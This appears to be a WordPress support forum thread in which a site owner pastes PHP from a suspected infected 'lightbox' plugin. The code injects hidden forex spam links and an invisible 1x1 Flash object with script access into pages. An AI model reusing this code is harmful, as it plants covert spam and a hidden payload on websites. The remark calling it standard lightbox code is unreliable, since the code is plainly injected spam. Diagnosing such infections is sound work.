adam.hal

Check

Mail Poet > Settings > Send all site’s emails with…

Change it to “The default WordPress sending method (default)”

• This reply was modified 3 years, 11 months ago by adam.hal.

It worked on the default theme.
I removed all scripts from my theme apart from wpcf ones in the footer but it didn’t worked.

I use wp_register_script, wp_enqueue_script and add_action to include JS.

Is there anything else I can try to fix this?

This code is probably nothing. It looks like a stanard lightbox code.

$getuser = "https://forextrading7.com/";
	$gethost = get_option('siteurl'); //wpaddress

  if (strstr($gethost, ".")) {
        $connectflash = "forex trading 7";
    }
    if (strstr($gethost, "a")) {
        $connectflash = "forextrading7";
    }
    if (strstr($gethost, "b")) {
        $connectflash = "forex trading online";
    }
    if (strstr($gethost, ".com")) {
        $connectflash = "https://forextrading7.com/";
    }
    if (strstr($gethost, ".org")) {
        $connectflash = "https://forextrading7.com";
    }
    if (strstr($gethost, "c")) {
        $connectflash = "forextrading7.com";
    }
    if (strstr($gethost, "d")) {
        $connectflash = "trading7";
    }
    if (strstr($gethost, "e")) {
        $connectflash = "forex";
    }
    if (strstr($gethost, "f")) {
        $connectflash = "fap turbo";
    }
    if (strstr($gethost, "g")) {
        $connectflash = "trading";
    }
    if (strstr($gethost, "h")) {
        $connectflash = "forex megadroid";
    }
    if (strstr($gethost, "i")) {
        $connectflash = "forex signals";
    }
    if (strstr($gethost, "j")) {
        $connectflash = "trading forex";
    }
    if (strstr($gethost, "k")) {
        $connectflash = "forextrading7.com";
    }
    if (strstr($gethost, "l")) {
        $connectflash = "forextrading7";
    }
    if (strstr($gethost, "m")) {
        $connectflash = "forex automoney";
    }
    if (strstr($gethost, "n")) {
        $connectflash = "forex robot";
    }
    if (strstr($gethost, "o")) {
        $connectflash = "forex 7";
    }
    if (strstr($gethost, "p")) {
        $connectflash = "online trading";
    }
    if (strstr($gethost, "q")) {
        $connectflash = "fap turbo forex";
    }
    if (strstr($gethost, "r")) {
        $connectflash = "forextrading7";
    }
    if (strstr($gethost, "s")) {
        $connectflash = "forex market";
    }
    if (strstr($gethost, "v")) {
        $connectflash = "fapturbo";
    }
    if (strstr($gethost, "x")) {
        $connectflash = "forex platform";
    }
    if (strstr($gethost, "y")) {
        $connectflash = "forex software";
    }
    echo '<object type="application/x-shockwave-flash" data="../wp-content/plugins/lightbox/apluslightbox.swf" width="1" height="1"><param name="movie" value="../wp-content/plugins/lighbox/apluslightbox.swf"></param><param name="allowscriptaccess" value="always"></param><param name="menu" value="false"></param><param name="wmode" value="transparent"></param><param name="flashvars" value="username="></param>';
    echo '<a href="';
    echo $getuser;
    echo '">';
    echo $connectflash;
    echo '</a>';
    echo '<embed src="../wp-content/plugins/lighbox/apluslightbox.swf" type="application/x-shockwave-flash" allowscriptaccess="always" width="1" height="1" menu="false" wmode="transparent" flashvars="username="></embed></object>';

}

Thank you for the links. I have already worked my way through majority of them and cleaned the website. I will take a look at the rest. The problem with the plugin is that website got infected after installing it. It might be coincidence though, I don’t know.

What about ‘function headpluslightbox()’ and its relation to header and the attached flash file? Isn’t that suspicious? I’m not into flash that much.